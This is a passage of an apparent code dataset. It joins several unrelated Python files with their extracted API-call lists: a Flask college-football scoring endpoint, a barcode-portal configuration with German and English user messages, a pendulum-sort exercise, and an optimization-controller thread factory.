self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | [((221, 248), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (242, 248), True, 'import numpy as np\n'), ((837, 864), 'itertools.product', 'itertools.product', (['*domains'], {}), '(*domains)\n', (854, 864), False, 'import itertools\n')] |
Sonictherocketman/cache-proxy | johnny_cache/__init__.py | 75650fb143b365e922c03f87e388c5710ad21799 | from .server import app # noqa
| [] |
usgs/neversink_workflow | python_packages_static/flopy/mf6/__init__.py | acd61435b8553e38d4a903c8cd7a3afc612446f9 | # imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
| [] |
issuu/jmespath | tests/__init__.py | 7480643df8ad0c99269b1fa6b9e793582bcb7efe | import sys
# The unittest module got a significant overhaul
# in 2.7, so if we're in 2.6 we can use the backported
# version unittest2.
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
import simplejson as json
from ordereddict import OrderedDict
else:
import unittest
import json
from collections import OrderedDict
| [] |
jtillman20/cfb-data-api | src/routes/scoring.py | 69bcae225e4fa0616eb526bd608e20ace17f1816 | from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
| [((875, 918), 'flask.request.args.get', 'request.args.get', (['"""sort"""', '"""points_per_game"""'], {}), "('sort', 'points_per_game')\n", (891, 918), False, 'from flask import request\n'), ((1380, 1408), 'flask.request.args.get', 'request.args.get', (['"""end_year"""'], {}), "('end_year')\n", (1396, 1408), False, 'from flask import request\n'), ((1424, 1448), 'flask.request.args.get', 'request.args.get', (['"""team"""'], {}), "('team')\n", (1440, 1448), False, 'from flask import request\n'), ((1701, 1804), 'models.Scoring.get_scoring', 'Scoring.get_scoring', ([], {'side_of_ball': 'side_of_ball', 'start_year': 'start_year', 'end_year': 'end_year', 'team': 'team'}), '(side_of_ball=side_of_ball, start_year=start_year,\n end_year=end_year, team=team)\n', (1720, 1804), False, 'from models import Scoring\n'), ((2058, 2108), 'utils.sort', 'sort', ([], {'data': 'scoring', 'attrs': 'attrs', 'reverses': 'reverses'}), '(data=scoring, attrs=attrs, reverses=reverses)\n', (2062, 2108), False, 'from utils import flask_response, rank, sort\n'), ((2124, 2158), 'utils.rank', 'rank', ([], {'data': 'scoring', 'attr': 'sort_attr'}), '(data=scoring, attr=sort_attr)\n', (2128, 2158), False, 'from utils import flask_response, rank, sort\n'), ((763, 836), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Side of ball must be either \'offense\' or \'defense\'"""'], {}), '("Side of ball must be either \'offense\' or \'defense\'")\n', (782, 836), False, 'from exceptions import InvalidRequestError\n'), ((1148, 1211), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Start year is a required query parameter"""'], {}), "('Start year is a required query parameter')\n", (1167, 1211), False, 'from exceptions import InvalidRequestError\n'), ((1274, 1342), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Query parameter start year must be an integer"""'], {}), "('Query parameter start year must be an integer')\n", (1293, 1342), False, 'from exceptions import InvalidRequestError\n'), ((1594, 1660), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Query parameter end year must be an integer"""'], {}), "('Query parameter end year must be an integer')\n", (1613, 1660), False, 'from exceptions import InvalidRequestError\n')] |
ZFMK/GermanBarcodeofLife | WebPortal/gbol_portal/vars.py | f9e9af699ba3f5b3d0d537819a8463c4162d7e82 | import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
'en': 'An error occured when uploading the collection sheet. Please sent it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Best regards,
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| [((25, 52), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (50, 52), False, 'import configparser\n')] |
HernandezDerekJ/Interview | challenges/Backend Challenge/pendulum_sort.py | 202d78767d452ecfe8c6220180d7ed53b1104231 | """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
    mid = (len(var) - 1) // 2
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
    # focus shouldn't be at beginning of array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
    # Even number of elements: the last slot takes the largest value
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
    print(var)
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
| [] |
garagonc/optimization-framework | swagger_server/controllers/threadFactory.py | 1ca57699d6a3f2f98dcaea96430e75c3f847b49f | import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
            time.sleep(60)
| [((963, 1001), 'utils_intern.messageLogger.MessageLogger.get_logger', 'MessageLogger.get_logger', (['__name__', 'id'], {}), '(__name__, id)\n', (987, 1001), False, 'from utils_intern.messageLogger import MessageLogger\n'), ((1357, 1366), 'IO.redisDB.RedisDB', 'RedisDB', ([], {}), '()\n', (1364, 1366), False, 'from IO.redisDB import RedisDB\n'), ((1657, 1701), 'os.path.join', 'os.path.join', (['"""/usr/src/app"""', 'dir', 'file_name'], {}), "('/usr/src/app', dir, file_name)\n", (1669, 1701), False, 'import os\n'), ((6082, 6224), 'IO.inputConfigParser.InputConfigParser', 'InputConfigParser', (['input_config_file', 'input_config_mqtt', 'self.model_name', 'self.id', 'self.optimization_type', 'persist_base_path', 'self.restart'], {}), '(input_config_file, input_config_mqtt, self.model_name,\n self.id, self.optimization_type, persist_base_path, self.restart)\n', (6099, 6224), False, 'from IO.inputConfigParser import InputConfigParser\n'), ((1609, 1635), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1625, 1635), False, 'import os\n'), ((2809, 2839), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (2837, 2839), False, 'import configparser\n'), ((5973, 5984), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5982, 5984), False, 'import os\n'), ((6601, 6623), 'json.dumps', 'json.dumps', (['opt_values'], {}), '(opt_values)\n', (6611, 6623), False, 'import json\n'), ((10890, 11111), 'optimization.controllerMpc.OptControllerMPC', 'OptControllerMPC', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 